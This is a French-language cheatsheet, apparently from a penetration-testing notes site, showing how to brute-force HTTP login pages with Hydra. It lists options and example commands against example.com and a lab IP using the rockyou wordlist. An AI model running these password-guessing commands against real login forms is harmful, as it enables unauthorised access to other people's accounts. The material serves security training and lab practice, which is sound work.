HTTP login avec Hydra

HTTP Login avec Hydra - Cheatsheet

Hydra est un outil de brute-force en ligne de commande permettant de tester des combinaisons de noms d'utilisateur et de mots de passe pour se connecter à des services HTTP.

Utilisation de base :

hydra -l NOM_UTILISATEUR -P CHEMIN_WORDLIST URL -s PORT -t THREADS http-get|http-post-form "/URL_LOGIN:PARAMETRES_POST:MESSAGE_ERREUR"

Options courantes :

  • -l : Nom d'utilisateur à tester (ou spécifiez une liste de noms d'utilisateurs séparés par des virgules).

  • -P : Chemin de la wordlist contenant les mots de passe à tester.

  • -s : Port du service cible (par défaut : 80 pour HTTP, 443 pour HTTPS).

  • -t : Nombre de threads à utiliser pour accélérer le processus de bruteforce.

  • http-get : Utilisation de la méthode HTTP GET pour se connecter (par défaut).

  • http-post-form : Utilisation de la méthode HTTP POST pour se connecter via un formulaire.

Exemples d'utilisation :

  1. Brute-force avec un nom d'utilisateur et une wordlist de mots de passe : hydra -l admin -P /chemin/vers/wordlist.txt [http://example.com/login](http://example.com/login)

  2. Brute-force avec une liste de noms d'utilisateurs et un mot de passe spécifique : hydra -L users.txt -p Password123 [http://example.com/login](http://example.com/login)

  3. Brute-force avec un formulaire HTTP POST : hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.131.127 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid"

  4. Brute-force en utilisant un port personnalisé (p.ex., 8080) : hydra -l admin -P /chemin/vers/wordlist.txt http://example.com:8080/login

PreviousInjections SQLNextLogin avec Burp

Last updated